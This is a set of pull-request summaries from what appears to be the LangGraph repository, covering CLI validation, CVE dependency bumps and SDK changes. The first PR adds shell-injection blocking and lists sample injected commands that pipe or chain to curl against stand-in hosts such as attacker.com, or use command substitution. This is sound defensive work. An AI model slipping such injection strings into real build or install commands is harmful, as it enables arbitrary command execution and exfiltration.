fix(cli): block shell injection chars in build/install commands (#7044)
## Summary - Adds `|`, `;`, `$`, `>`, `<`, `\t` to `DISALLOWED_BUILD_COMMAND_CHARS` to prevent command injection in CLI `build_command` / `install_command` parameters - Previously these values were interpolated directly into Dockerfile `RUN` directives with no validation - Single `&` is blocked (background execution) while `&&` remains allowed since it's commonly used in build commands (e.g. `npm install && npm build`) - Adds `has_disallowed_build_command_content()` validation function and applies it in the `build` CLI command - Mirrors langchain-ai/langchainplus#19143 **Attack examples now blocked:** - `pip install foo | curl attacker.com` (pipe) - `npm install; curl evil.com` (semicolon) - `pip install $(whoami)` (command substitution) - `pip install ${IFS}evil` (variable expansion) - `npm install & curl evil.com` (background execution) ## Test Plan - [x] 27 new unit tests covering all disallowed chars, injection patterns, single `&` rejection, `&&` allowance, and valid commands - [x] All 64 tests in `test_config.py` pass (37 existing + 27 new) 🤖 Generated with [Claude Code](https://claude.com/claude-code) --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> |

fix: bump minimatch to resolve CVE-2026-26996, CVE-2026-27903, CVE-2026-27904 (#6968)
## CVE Fix: minimatch **Package:** `minimatch` **CVEs:** CVE-2026-26996, CVE-2026-27903, CVE-2026-27904 (all HIGH) **Vulnerable versions:** `< 3.1.4`, `>= 9.0.0 < 9.0.7`, `>= 10.0.0 < 10.2.3` **Resolved versions:** `3.1.5`, `9.0.9`, `10.2.4` ### Fix strategy Lockfile re-resolution (transitive dependency). Removed stale minimatch resolution entries from yarn.lock files and ran `yarn install` to re-resolve to the latest compatible versions. ### Files changed - `libs/cli/js-examples/yarn.lock` - `libs/cli/js-monorepo-example/yarn.lock` ### Verification - [x] Lockfile updated — resolved versions are now 3.1.5, 9.0.9, 10.2.4 - [x] All 3 CVEs resolved in both lockfiles 🤖 Submitted by langster-patch Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> |

fix(langgraph): correct ParentCommand bubbling when checkpoint_ns includes numeric task segments (#6864)
Fixes incorrect `Command.PARENT` bubbling when checkpoint namespaces include numeric task-disambiguation segments like `|1`. In some nested-invoke/fanout scenarios, the runtime inserts a purely-numeric namespace segment between `name:task_id` segments (e.g. `parent_first:<id>|1|node:<id>`). The previous ParentCommand rewrite logic only handled numeric segments at the end of the namespace, which could produce a malformed parent graph identifier (e.g. `parent_first:<id>|1`) and prevent the command from routing to the intended parent node. This change normalizes checkpoint namespaces by dropping numeric segments before computing the parent namespace in both sync and async retry paths. Added a minimal regression test that exercises the nested-invoke case and asserts that `Command(graph=Command.PARENT, goto=...)` reliably routes to the parent graph, regardless of whether the jump comes from the first or second nested invocation. |

chore(deps): bump the all-dependencies group in /libs/checkpoint-postgres with 2 updates (#6916)
Bumps the all-dependencies group in /libs/checkpoint-postgres with 2 updates: [psycopg](https://github.com/psycopg/psycopg) and [ruff](https://github.com/astral-sh/ruff). Updates `psycopg` from 3.3.2 to 3.3.3 <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/psycopg/psycopg/blob/master/docs/news.rst">psycopg's changelog</a>.</em></p> <blockquote> <p>.. currentmodule:: psycopg</p> <p>.. index:: single: Release notes single: News</p> <h1><code>psycopg</code> release notes</h1> <h2>Current release</h2> <p>Psycopg 3.3.3 ^^^^^^^^^^^^^</p> <ul> <li>Retain <code>Error.pgconn</code> when raising a single exception for multiple connection attempt errors (🎫<code>[#1246](https://github.com/psycopg/psycopg/issues/1246)</code>).</li> <li>Return a proper error when server sends <code>ErrorResponse</code> for a <code>Sync</code> after a <code>Parse</code> (🎫<code>[#1260](https://github.com/psycopg/psycopg/issues/1260)</code>).</li> </ul> <p>Psycopg 3.3.2 ^^^^^^^^^^^^^</p> <p>Fix race condition in adapters at startup (🎫<code>[#1230](https://github.com/psycopg/psycopg/issues/1230)</code>).</p> <p>Psycopg 3.3.1 ^^^^^^^^^^^^^</p> <p>Fix iteration on server-side cursors (🎫<code>[#1226](https://github.com/psycopg/psycopg/issues/1226)</code>).</p> <h2>Psycopg 3.3.0</h2> <p>.. rubric:: New top-level features</p> <ul> <li>Add :ref:<code>template strings queries \<template-strings></code> (🎫<code>[#1054](https://github.com/psycopg/psycopg/issues/1054)</code>).</li> <li>More flexible :ref:<code>composite adaptation<adapt-composite></code>: it is now possible to adapt Python objects to PostgreSQL composites and back even if they are not sequences or if they take keyword arguments (🎫<code>[#932](https://github.com/psycopg/psycopg/issues/932)</code>, 🎫<code>[#1202](https://github.com/psycopg/psycopg/issues/1202)</code>).</li> <li>Cursors are now iterators_, not just iterables_. docs(sdk-py): update auth docstrings to default-deny pattern (#6933)
## Summary - Updated all auth docstring examples in `libs/sdk-py` to follow a **default-closed** pattern - Every example now first registers a global `@auth.on` handler that **denies** all requests, then adds resource/action-specific handlers to selectively **allow** access - Fixed inconsistencies (e.g., `@auth.on` vs `@my_auth.on`, sync vs async handlers) and made examples more realistic ## Test plan - [x] `make format` passes - [x] `make lint` passes - [x] Changes are docstring-only — no runtime behavior affected 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> |

feat(sdk-py): add extract parameter to threads.search() (#6880)
## Summary
- Adds `extract` parameter to `threads.search()` in both async and sync
clients
- Adds `extracted` field to the `Thread` TypedDict response type
- The `extract` parameter accepts a `dict[str, str]` mapping aliases to
JSONB paths (e.g., `{"last_msg": "values.messages[-1]"}`)
- Depends on server-side support in
https://github.com/langchain-ai/langgraph-api/pull/2609
## Test plan
- [ ] Verify types are correct via lint/format (already passing)
- [ ] Integration test against server with extract feature enabled
Release Notes: Add `extract` parameter to `threads.search()` for
extracting nested values from thread data during search.

fix(cli): update graph config schema to support description field (#6895)
## Summary
- The config processing code in `config.py` already handles graphs
defined as `{"path": "...", "description": "..."}` dicts, but the
`Config` TypedDict and JSON schema only declared `dict[str, str]`
- Added a `GraphDef` TypedDict with `path` and optional `description`
fields
- Updated `Config.graphs` to `dict[str, str | GraphDef]` and regenerated
the JSON schemas
- This makes the schema match the actual runtime behavior and fixes
IDE/schema validation for users who use the dict format
## Test plan
- [x] `make format` passes
- [x] `make lint` passes
- [x] `make test` passes (all 85 tests)
- [x] Schema regeneration produces consistent output
Release Notes: Update `langgraph.json` schema to support `{"path":
"...", "description": "..."}` format for graph definitions.

fix: bump js-yaml to 3.14.2 to resolve CVE-2025-64718 (#6879)
## Security Alert Patch Resolves 1 Dependabot security alert (medium severity). ### Package Updated | Package | Old Version | New Version | Strategy | CVE Resolved | |---------|-------------|-------------|----------|--------------| | `js-yaml` | 3.14.1 | 3.14.2 | Lockfile patch (within-range bump) | CVE-2025-64718 | ### CVE Details **CVE-2025-64718** / [GHSA-mh29-5h37-fv8m](https://github.com/advisories/GHSA-mh29-5h37-fv8m) — `js-yaml` prototype pollution via YAML merge keys (`<<`). Affects versions < 3.14.2. The vulnerable package is a transitive dev dependency pulled in by `@istanbuljs/load-nyc-config@1.1.0` (a Jest internal). No runtime impact. ### Fix Strategy Lockfile-only patch in `libs/cli/js-examples/yarn.lock`. The `^3.13.1` version range already allows 3.14.2, so no manifest changes were needed. The `js-yaml@^4.1.1` entry (used by `@eslint/eslintrc`) is untouched. ### Verification - [x] Lockfile updated — `js-yaml@^3.13.1` now resolves to `3.14.2` - [x] `js-yaml@^4.1.1` entry unchanged (`4.1.1`) - [x] `yarn install --frozen-lockfile` passes 🤖 Submitted by langster-patch Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com> |

feat(sdk-py): add stream_mode, stream_subgraphs, stream_resumable, durability to crons (#6876)
## Summary - Adds `stream_mode`, `stream_subgraphs`, `stream_resumable`, and `durability` parameters to cron `create`, `create_for_thread`, and `update` methods in both async and sync clients - Adds corresponding fields to the `CronUpdate` TypedDict in `schema.py` - Adds `checkpoint_during` deprecation warnings to cron create methods (consistent with the runs client pattern) These fields were added to the OpenAPI spec in langgraph-api but were not yet reflected in the Python SDK. ## Test plan - [x] `make format` passes - [x] `make lint` passes - [x] `make test` passes (69/69, including sync/async API parity test) --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> |

fix: sequential interrupt handling w/ functional API (#6863)
In the original proposed fix https://github.com/langchain-ai/langgraph/pull/6863, we were guarding this specific case by only checking for null resume in the scratchpad. But I noticed the tests passed on main for the sync case, indicating an inconsistency between the two paths. Seems like we were making a redundant put_writes call when replaying the async tasks --------- Co-authored-by: William FH <13333726+hinthornw@users.noreply.github.com> |

feat(sdk-py): improve store auth type safety and docstrings (#6867)
## Summary - Add `_StoreActionOn` class with action-specific decorator properties (`.put`, `.get`, `.search`, `.delete`, `.list_namespaces`) to `_StoreOn`, enabling `@auth.on.store.put` etc. which was documented but not implemented - Update docstring examples to show namespace-rewriting pattern as the canonical store auth approach - Fix `AuthContext.action` docstring: add missing `search` and `delete` store actions - Fix typo in `StoreSearch.query` docstring - Add auth-handler-aware docstrings to all store TypedDicts ## Test plan - [x] `make format && make lint` passes in `libs/sdk-py` - [] Verify `@auth.on.store.put` decorator works at runtime Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> |

fix(sdk-py): allow reset of config/context in assistants update (#6862)
This distinguishes an empty `config`/`context` (`{}`) from a null
`config`/`context`, and therefore allows resetting these fields.
(Easiest to test this E2E on the server side; will create a separate PR
for that.)
